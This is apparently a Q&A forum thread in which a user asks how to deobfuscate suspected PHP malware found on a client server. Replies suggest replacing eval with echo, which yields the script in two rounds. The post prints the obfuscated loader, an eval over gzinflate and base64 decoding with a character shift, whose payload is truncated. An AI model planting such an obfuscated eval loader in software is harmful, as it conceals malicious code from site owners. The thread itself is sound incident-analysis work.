# How to deobfuscate this potential PHP malware found on a client system?

Tags: php, shell, scripting

I'm trying to de-obfuscate this script found on a client system with no luck so far.

```
<?php function LwAC($SvniN)
{ 
$SvniN=gzinflate(base64_decode($SvniN));
 for($i=0;$i<strlen($SvniN);$i++)
 {
$SvniN[$i] = chr(ord($SvniN[$i])-1);
 }
 return $SvniN;
 }eval(LwAC("NL3XrutckqX7AAXUOyQadZEFokHv0KcuRFISRS+SotFBo0Ereu8b/ewnVtepvMhEZu5/7SXDOSNGjPHFP/7x96987ZKl7Lt/TJ9g/fzz3zxRfMj//q//8r//8a//8p//5T9+V9nlTbRk/4yjOWOo/5VmSZ9m//Vn//1//Ou//CPvp3/+W/kf2P/4t/L/mZepybr/+r/hf0EQ+IH/+N//9QP/338r/+c//uMfSTH9s5/S///P/f2P//7f8f/7w/4P/OkpW9ap+8d//gp/f8P/ybao+ed//pb/jbVwskGsZ10mOspw/JflJTfCCb8ZXr/yIfxkjbz17+It/MTCDBLTnXayuGWdQlpor9RekOIj40+rH+VWgrKzNk675Nj192nfY/QlCIrlsrmVo/xGWShjoR8BRRcU4bVhRcuAaLt4oJGsG3g0u2kCQWdHtO3dRHeTton5MTpat/c5msWKhKndxa7dIOOMsvtVuzvTy75zkWaMJErk3+WcuHGk9RxDX+JPf2UVXZzBUSSPXFZ5bew0JU+SOktF1d2a9czZqx6Iz+7lmzu5N1R+1YtFsDFNI0gYFII1BgFLZ+K25+xsoZmoPtXtmffjqHKrkK5YlTxz84dkKKq9WzRrR3YY2WhiWY7+OJMwkgjBrvxQ4Cj2TbftuM2a323oRsQpclb0klrwT7ouhhQ1mwsY//ff7x+BonLjgaYRJe0pfBzPpkcdLyCPh80zMcoifdaF95GRaRbhUH4v6KSIXiYRhHHbsN+rXZmp5SVUlmwDzy9HkAMvvdff/B2kH1o/kehjrCOaWbF2qd1EVtFb2+fs66Cvjd+1ZSU4ZPQSCjtR4SFXvGt7CPN9lZlInF8DQVH61dmpwvPO80hU7Y4ggePh5BtdNIyOyLeDRhNT7lWSKXXkPZOUM0jx9q7Yi1XxqjD6J/IlSfgxKrOneYyd7kGvi0cjG8umKGcxxiJNjGKZx+SRTZpr5HTBH49z9O8/vg9CyawztvoAV8k1tZ7O0XbR96LHE91ygorwn52StKO98l9NY7zFU2vzy8cpZZF2vlftkrmkfAW7s4prjfMckiy21XYab2GJhGZci7oIx0cVj+xr20h4iYV8tjwD4yCo60u6cVwhsfvIO46p0Y/WkjGPwj9Gfhqe893FniWX+nonTn7QjRqZCb4+Qsrz/GhZFEIt99Jy2BxFV/KT0gdKHg29GFmebyJDdA2G"));?>
```

Please note that I have to remove plenty of the codes before this `"));?>`

Comment: You need to manually reverse engineer the code.

Comment: Change `eval` to `echo` to see the code.

Comment: I'd recommend to do this on a virtual machine that you can simply delete if anything goes wrong. The obfuscated code might contain further eval() commands.

Comment: @Dharman Exactly what I've been doing except that I have no luck with that yet.

Comment: @Barmar That completely elude me. I will give that a try.

Comment: Can't decode the data to reverse engineer since I think you've omitted some of the payload (string argument to `LwAC`). Would you be able to post that on pastebin if it exceeds post character limit.

Comment: @alistaircol Please find below the paste bin to the complete code:

https://pastebin.com/6VKim250

Comment: @SholaKOlalekan changing `eval` to `echo` would output another [obfuscated codes](https://pastebin.com/DNhCguAM), and deobfuscate it again would output [this script](https://pastebin.com/CCkZdXRy), I used [rextester](https://rextester.com/l/php_online_compiler)

Answer (score 1):

A very big thank you to everyone who took their time to go through this question and put in advice/direction in attempt to deobfuscate [this PHP code](https://rextester.com/l/php_online_compiler). Special thanks to @Hasta Dhana.

Now, taking into consideration the recommendation of @digijay *to do this on a virtual machine where it can simply be deleted if anything goes wrong*, the use of an [online php compiler](https://rextester.com/l/php_online_compiler) as recommended and used by @Hasta Dhana was an awesome choice. All I had to do was to paste in the whole code, change the `eval` to `echo` and **run it**. That, successfully had the work done and pretty fast except that the output was however [obfuscated](https://pastebin.com/DNhCguAM) in the exact same way. This time the solution is as simple as deobfuscate the output repeating the same actions that get us here. Which is to copy the whole of the output and change the `eval` in it to `echo` then **run it** and hurray there we have the script deobfuscated.